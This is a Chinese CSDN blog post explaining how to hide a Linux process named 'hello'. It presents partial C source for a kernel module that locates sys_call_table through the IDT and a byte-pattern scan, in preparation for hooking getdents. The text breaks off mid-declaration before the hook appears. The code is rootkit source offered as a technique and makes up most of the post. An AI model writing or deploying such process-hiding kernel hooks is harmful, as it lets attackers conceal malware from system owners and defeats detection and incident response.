Linux隐藏进程

最新推荐文章于 2024-07-30 18:42:44 发布

Mr_John_Liang

最新推荐文章于 2024-07-30 18:42:44 发布

阅读量5.5k

点赞数

分类专栏： linux 文章标签： linux x86_64 隐藏进程

本文链接：https://blog.csdn.net/liangzhao_jay/article/details/50834269

版权

在不修改内核源码的情况下，通过劫持系统调用和Linux可卸载模块编程，实现隐藏进程的技术。示例程序包含在makefile中，用于编译和清理。参考了多个关于Linux高级隐藏技术和系统调用劫持的文章。

摘要由CSDN通过智能技术生成

系统信息：内核为2.6.32， CentOSX86_64

由于不能修改内核源码，故需要引入劫持系统调用技术、Linux可卸载模块编程技术

示例程序

#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/init.h>
#include <linux/sched.h>
#include <asm/unistd.h>
#include <linux/dirent.h>
#include <linux/stat.h>
#include <linux/fs.h>
#include <linux/proc_fs.h>
#define CALLOFF 100

//define idtr and idt struct
//隐藏进程名为：hello

char psname[10] = "hello";
char *processname = psname;

struct{
    unsigned short limit;
    unsigned int base;
}__attribute__((packed))idtr;

struct{
    unsigned short off_low;
    unsigned short sel;
    unsigned char none;
    unsigned char flags;
    unsigned short off_high;
}__attribute__((packed))*idt;

struct _idt
{
    unsigned short offset_low,segment_sel;
    unsigned char reserved,flags;
    unsigned short offset_high;
};

/*unsigned long *getscTable()
{
    unsigned char idtr[6] = {0}, *shell = NULL, *sort = NULL;
    struct _idt *idtLong = NULL;
    unsigned long system_call = 0, sct = 0;
    unsigned short offset_low = 0, offset_high = 0;
    char *p = NULL;
    int i = 0;

    __asm__("sidt %0" : "=m" (idtr));

    idtLong=(struct _idt*)(*(unsigned long*)&idtr[2]+8*0x80);
    offset_low = idtLong->offset_low;
    offset_high = idtLong->offset_high;
    system_call = (offset_high<<16)|offset_low;

    shell=(char *)system_call;
    sort="\xff\x14\x85";

    for(i=0;i<(100-2);i++)
    {
        if(shell[i] == sort[0] && shell[i+1] == sort[1] && shell[i+2] == sort[2])
	{
	    break;
	}
    }

    p = &shell[i];
    p += 3;

    sct=*(unsigned long*)p;
    return (unsigned long*)(sct);
}*/

//define function, Point to the system being hijacked

struct linux_dirent
{
    unsigned long     d_ino;
    unsigned long     d_off;
    unsigned short    d_reclen;
    char    d_name[1];
};

asmlinkage long (*orig_getdents)(unsigned int fd, struct linux_dirent __user *dirp, unsigned int count);

//int orig_cr0 = 0;
unsigned long *sys_call_table = NULL;

//get function system_call addr

/*void* get_system_call(void)
{
    printk(KERN_ALERT "start get_system_call...\n");
    void * addr = NULL;
    asm("sidt %0":"=m"(idtr));
    idt = (void*) ((unsigned long*)idtr.base);
    addr = (void*) (((unsigned int)idt[0x80].off_low) | (((unsigned int)idt[0x80].off_high)<<16 ));
    return addr;
}*/

//find sys_call_table

char* fin